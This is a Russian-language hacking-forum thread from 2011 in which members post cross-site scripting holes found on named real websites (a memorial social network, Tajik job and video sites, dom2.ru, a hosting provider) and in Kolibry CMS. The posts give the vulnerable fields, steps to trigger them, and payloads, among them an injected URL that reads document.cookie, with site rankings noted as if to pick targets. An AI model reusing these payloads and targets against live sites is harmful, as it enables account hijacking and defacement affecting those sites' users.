HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #451  
Старый 10.11.2011, 04:12
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
С нами: 8742676

Репутация: 94
По умолчанию

Цитата:
Сообщение от Ruslan1817  
эта пассивка...!
Okay
 
Ответить с цитированием

  #452  
Старый 10.11.2011, 04:22
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Социальная сеть мёртвых.

pomnipro.ru

Уязвимо поле ввода комментариев. (только для залогинённых)

И в своём профиле все поля.

Ничего не фильтруется.

http://pomnipro.ru/memorypage/show/834/

За 2 месяца так и не додумались пофиксить, хотя о баге знают.
 
Ответить с цитированием

  #453  
Старый 10.11.2011, 20:58
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

За Русского и Эстонского пилота. Часть 2 (Coming Soon)

Site: http://www.joblist.tj/

1. Добавляем Вакансию: http://www.joblist.tj/addvacancy.php

2. Утверждаем Вакансию: http://www.joblist.tj/moderation/

3. Profit!


Уязвимые строки:

Код:
"Название организации"
"Должность"
"Требования к кандидату"
"Условия труда"
"Задачи и обязанности рабочего"
"Телефон"
"Факс"
"Email"
"Web"
Sploit:

Код:
">alert(/mix0x0/)
Site: http://www.tajtube.tj

Поле: Сайт

Sploit:

Код:
">alert(/mix0x0/)
 
Ответить с цитированием

  #454  
Старый 11.11.2011, 23:17
Drager
Новичок
Регистрация: 02.11.2011
Сообщений: 12
С нами: 7646006

Репутация: 32
По умолчанию

Kolibry CMS

Target: Kolibry CMS v.0.3.1

Info: Persistent XSS подвержены поля: “Город”, “Другая информация”, “Подпись”, в разделе “Личные данные”.

Info: Persistent XSS в поле “Тема сообщения”, раздела “Личные сообщения”.

 
Ответить с цитированием

  #455  
Старый 12.11.2011, 23:17
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

dom2.ru

Без комментариев. Все знают, что это

Яндекс тИЦ (CY) 600

Google PageRank (PR) 6


Любого пользователя можно "поздравить", отправив ему в ЛС открытку (даже без авторизации). Создаются открытки и добавляются в общий каталог также без авторизации.

Уязвимо название открытки, которое вводится, после нажатия "сохранить" в редакторе.

Пример:

dom2.ru/community/users/123/send-gift/83730643

123 - ID пользователя, которому отправляется сообщение.

83730643 - ID открытки.
 
Ответить с цитированием

  #456  
Старый 15.11.2011, 11:32
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Finki  
http://www.
sonyericsson.com
/xperianordic/index-modal.php?cc=se&lc=sv&item=%22%3E%3Cscript%3Ealert %28%27lol%27%29%3C/script%3E
Эмм молодой_человек/леди... Вы знаете отличия активных ХСС от пассивных ?? Знаете ? А зачем тогда постите ЭТО ?

З.Ы. Прошу модеров принять адекватные действия.
 
Ответить с цитированием

  #457  
Старый 15.11.2011, 19:36
Дядька
Познающий
Регистрация: 24.11.2010
Сообщений: 37
С нами: 8139926

Репутация: 0
По умолчанию

spooo.ru

http://spooo.ru/users/registration/

Уязвимы поля "Имя:", "Фамилия:"

">alert(/XSS/)

ТИЦ: 90 Pr: 2
 
Ответить с цитированием

  #458  
Старый 15.11.2011, 19:52
Дядька
Познающий
Регистрация: 24.11.2010
Сообщений: 37
С нами: 8139926

Репутация: 0
По умолчанию

nvhost.ru - хостинг

http://nvhost.ru/domains.php

Уязвимо поле проверки домена.

">alert(/XSS/)

ТИЦ: 150 Pr: 4
 
Ответить с цитированием

  #459  
Старый 15.11.2011, 21:22
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Finki  
Прошу создать тему с пассивными XSS на популярных сайтов.
Абсолютно не вижу смысла. Большинству народу не нужны пассивки, если они не почтовиках. А тому кому нужны - сам найдёт на нужном домене.
 
Ответить с цитированием

  #460  
Старый 21.11.2011, 01:00
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

SIXSS

Код:
http://www.playonline.com.ua/game.php?id=1313%29--+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
ой завтыкал... это ж скуля
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.